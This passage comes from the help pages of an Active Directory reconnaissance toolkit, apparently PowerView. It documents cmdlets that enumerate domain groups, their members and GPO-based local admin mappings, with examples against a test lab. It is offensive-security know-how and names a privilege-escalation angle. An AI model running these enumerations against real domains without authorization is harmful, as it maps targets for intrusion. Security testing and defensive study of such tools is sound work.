$SecPassword)\r\nGet-DomainGPOUserLocalGroupMapping -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA SamAccountName (e.g.\r\nharmj0y), DistinguishedName (e.g.\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\r\nfor the user/group to identity GPO local group mappings for.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LocalGroup\r\nThe local group to check access against.\r\nCan be \"Administrators\" (S-1-5-32-544), \"RDP/Remote Desktop Users\" (S-1-5-32-555),\r\nor a custom local SID.\r\nDefaults to local 'Administrators'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Administrators\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to enumerate GPOs for, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\n{{Fill SearchBase Description}}\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.GPOLocalGroupMapping\r\n\r\nA custom PSObject containing any target identity information and what local\r\ngroup memberships they're a part of through GPO correlation.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/](http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainGroup.md",
    "content": "# Get-DomainGroup\r\n\r\n## SYNOPSIS\r\nReturn all groups or specific group objects in AD.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainGroup [[-Identity] <String[]>] [-MemberIdentity <String>] [-AdminCount] [-Domain <String>]\r\n [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]\r\n [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]\r\n [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]\r\n```\r\n\r\n## DESCRIPTION\r\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\r\nLDAP filter based on targeting/filter parameters, and searches for all objects\r\nmatching the criteria.\r\nTo only return specific properies, use\r\n\"-Properties samaccountname,usnchanged,...\".\r\nBy default, all group objects for\r\nthe current domain are returned.\r\nTo return the groups a specific user/group is\r\na part of, use -MemberIdentity X to execute token groups enumeration.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainGroup | select samaccountname\r\n```\r\n\r\nsamaccountname\r\n--------------\r\nWinRMRemoteWMIUsers__\r\nAdministrators\r\nUsers\r\nGuests\r\nPrint Operators\r\nBackup Operators\r\n...\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainGroup *admin* | select distinguishedname\r\n```\r\n\r\ndistinguishedname\r\n-----------------\r\nCN=Administrators,CN=Builtin,DC=testlab,DC=local\r\nCN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local\r\nCN=Schema Admins,CN=Users,DC=testlab,DC=local\r\nCN=Enterprise Admins,CN=Users,DC=testlab,DC=local\r\nCN=Domain Admins,CN=Users,DC=testlab,DC=local\r\nCN=DnsAdmins,CN=Users,DC=testlab,DC=local\r\nCN=Server Admins,CN=Users,DC=testlab,DC=local\r\nCN=Desktop Admins,CN=Users,DC=testlab,DC=local\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl\r\n```\r\n\r\nsamaccountname\r\n--------------\r\nServer Admins\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose\r\n```\r\n\r\nVERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local\r\nVERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local)))\r\n\r\nusncreated            : 13245\r\ngrouptype             : -2147483646\r\nsamaccounttype        : 268435456\r\nsamaccountname        : Desktop Admins\r\nwhenchanged           : 8/10/2016 12:30:30 AM\r\nobjectsid             : S-1-5-21-890171859-3433809279-3366196753-1118\r\nobjectclass           : {top, group}\r\ncn                    : Desktop Admins\r\nusnchanged            : 13255\r\ndscorepropagationdata : 1/1/1601 12:00:00 AM\r\nname                  : Desktop Admins\r\ndistinguishedname     : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\r\nmember                : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local\r\nwhencreated           : 8/10/2016 12:29:43 AM\r\ninstancetype          : 4\r\nobjectguid            : f37903ed-b333-49f4-abaa-46c65e9cca71\r\nobjectcategory        : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainGroup -Credential $Cred\r\n\r\n### -------------------------- EXAMPLE 6 --------------------------\r\n```\r\nGet-Domain | Select-Object -Expand name\r\n```\r\n\r\ntestlab.local\r\n\r\n'DEV\\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainGroup\\] Extracted domain 'dev.testlab.local' from 'DEV\\Domain Admins'\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainGroup\\] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins)))\r\n\r\ndistinguishedname\r\n-----------------\r\nCN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA SamAccountName (e.g.\r\nGroup1), DistinguishedName (e.g.\r\nCN=group1,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)\r\nspecifying the group to query for.\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -MemberIdentity\r\nA SamAccountName (e.g.\r\nGroup1), DistinguishedName (e.g.\r\nCN=group1,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)\r\nspecifying the user/group member to query for group membership.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: UserName\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -AdminCount\r\nSwitch.\r\nReturn users with '(adminCount=1)' (meaning are/were privileged).\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Properties\r\nSpecifies the properties of the output object to retrieve from the server.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SecurityMasks\r\nSpecifies an option for examining security information of a directory object.\r\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -FindOne\r\nOnly return one result object.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: ReturnOne\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Raw\r\nSwitch.\r\nReturn raw results instead of translating the fields into a custom PSObject.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.Group\r\n\r\nCustom PSObject with translated group property fields.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainGroupMember.md",
    "content": "# Get-DomainGroupMember\r\n\r\n## SYNOPSIS\r\nReturn the members of a specific domain group.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID\r\n\r\n## SYNTAX\r\n\r\n### None (Default)\r\n```\r\nGet-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]\r\n [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>]\r\n [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n### ManualRecurse\r\n```\r\nGet-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-Recurse] [-LDAPFilter <String>]\r\n [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n### RecurseUsingMatchingRule\r\n```\r\nGet-DomainGroupMember [-Identity] <String[]> [-Domain <String>] [-RecurseUsingMatchingRule]\r\n [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone]\r\n [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nBuilds a directory searcher object using Get-DomainSearcher, builds a custom\r\nLDAP filter based on targeting/filter parameters, and searches for the specified\r\ngroup matching the criteria.\r\nEach result is then rebound and the full user\r\nor group object is returned.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainGroupMember \"Desktop Admins\"\r\n```\r\n\r\nGroupDomain             : testlab.local\r\nGroupName               : Desktop Admins\r\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\r\nMemberDomain            : testlab.local\r\nMemberName              : Testing Group\r\nMemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local\r\nMemberObjectClass       : group\r\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1129\r\n\r\nGroupDomain             : testlab.local\r\nGroupName               : Desktop Admins\r\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\r\nMemberDomain            : testlab.local\r\nMemberName              : arobbins.a\r\nMemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local\r\nMemberObjectClass       : user\r\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n'Desktop Admins' | Get-DomainGroupMember -Recurse\r\n```\r\n\r\nGroupDomain             : testlab.local\r\nGroupName               : Desktop Admins\r\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\r\nMemberDomain            : testlab.local\r\nMemberName              : Testing Group\r\nMemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local\r\nMemberObjectClass       : group\r\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1129\r\n\r\nGroupDomain             : testlab.local\r\nGroupName               : Testing Group\r\nGroupDistinguishedName  : CN=Testing Group,CN=Users,DC=testlab,DC=local\r\nMemberDomain            : testlab.local\r\nMemberName              : harmj0y\r\nMemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local\r\nMemberObjectClass       : user\r\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1108\r\n\r\nGroupDomain             : testlab.local\r\nGroupName               : Desktop Admins\r\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\r\nMemberDomain            : testlab.local\r\nMemberName              : arobbins.a\r\nMemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local\r\nMemberObjectClass       : user\r\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule\r\n```\r\n\r\nGroupDomain             : testlab.local\r\nGroupName               : Desktop Admins\r\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\r\nMemberDomain            : testlab.local\r\nMemberName              : harmj0y\r\nMemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local\r\nMemberObjectClass       : user\r\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1108\r\n\r\nGroupDomain             : testlab.local\r\nGroupName               : Desktop Admins\r\nGroupDistinguishedName  : CN=Desktop Admins,CN=Users,DC=testlab,DC=local\r\nMemberDomain            : testlab.local\r\nMemberName              : arobbins.a\r\nMemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local\r\nMemberObjectClass       : user\r\nMemberSID               : S-1-5-21-890171859-3433809279-3366196753-1112\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\nGet-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember\r\n```\r\n\r\n### -------------------------- EXAMPLE 5 --------------------------\r\n```\r\n'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember\r\n```\r\n\r\n### -------------------------- EXAMPLE 6 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nGet-DomainGroupMember -Credential $Cred -Identity 'Domain Admins'\r\n\r\n### -------------------------- EXAMPLE 7 --------------------------\r\n```\r\nGet-Domain | Select-Object -Expand name\r\n```\r\n\r\ntestlab.local\r\n\r\n'dev\\domain admins' | Get-DomainGroupMember -Verbose\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainGroupMember\\] Extracted domain 'dev.testlab.local' from 'dev\\domain admins'\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainGroupMember\\] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins)))\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainObject\\] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local)))\r\n\r\nGroupDomain             : dev.testlab.local\r\nGroupName               : Domain Admins\r\nGroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local\r\nMemberDomain            : dev.testlab.local\r\nMemberName              : user1\r\nMemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local\r\nMemberObjectClass       : user\r\nMemberSID               : S-1-5-21-339048670-1233568108-4141518690-201108\r\n\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainObject\\] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local)))\r\nGroupDomain             : dev.testlab.local\r\nGroupName               : Domain Admins\r\nGroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local\r\nMemberDomain            : dev.testlab.local\r\nMemberName              : Administrator\r\nMemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local\r\nMemberObjectClass       : user\r\nMemberSID               : S-1-5-21-339048670-1233568108-4141518690-500\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA SamAccountName (e.g.\r\nGroup1), DistinguishedName (e.g.\r\nCN=group1,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)\r\nspecifying the group to query for.\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Recurse\r\nSwitch.\r\nIf the group member is a group, recursively try to query its members as well.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: ManualRecurse\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -RecurseUsingMatchingRule\r\nSwitch.\r\nUse LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse.\r\nMuch faster than manual recursion, but doesn't reveal cross-domain groups,\r\nand only returns user accounts (no nested group objects themselves).\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: RecurseUsingMatchingRule\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SecurityMasks\r\nSpecifies an option for examining security information of a directory object.\r\nOne of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.GroupMember\r\n\r\nCustom PSObject with translated group member property fields.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/](http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Get-DomainManagedSecurityGroup.md",
    "content": "# Get-DomainManagedSecurityGroup\r\n\r\n## SYNOPSIS\r\nReturns all security groups in the current (or target) domain that have a manager set.\r\n\r\nAuthor: Stuart Morgan (@ukstufus) \\<stuart.morgan@mwrinfosecurity.com\\>, Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl\r\n\r\n## SYNTAX\r\n\r\n```\r\nGet-DomainManagedSecurityGroup [[-Domain] <String>] [-SearchBase <String>] [-Server <String>]\r\n [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]\r\n [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nAuthority to manipulate the group membership of AD security groups and distribution groups\r\ncan be delegated to non-administrators by setting the 'managedBy' attribute.\r\nThis is typically\r\nused to delegate management authority to distribution groups, but Windows supports security groups\r\nbeing managed in the same way.\r\n\r\nThis function searches for AD groups which have a group manager set, and determines whether that\r\nuser can manipulate group membership.\r\nThis could be a useful method of horizontal privilege\r\nescalation, especially if the manager can manipulate the membership of a privileged group.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 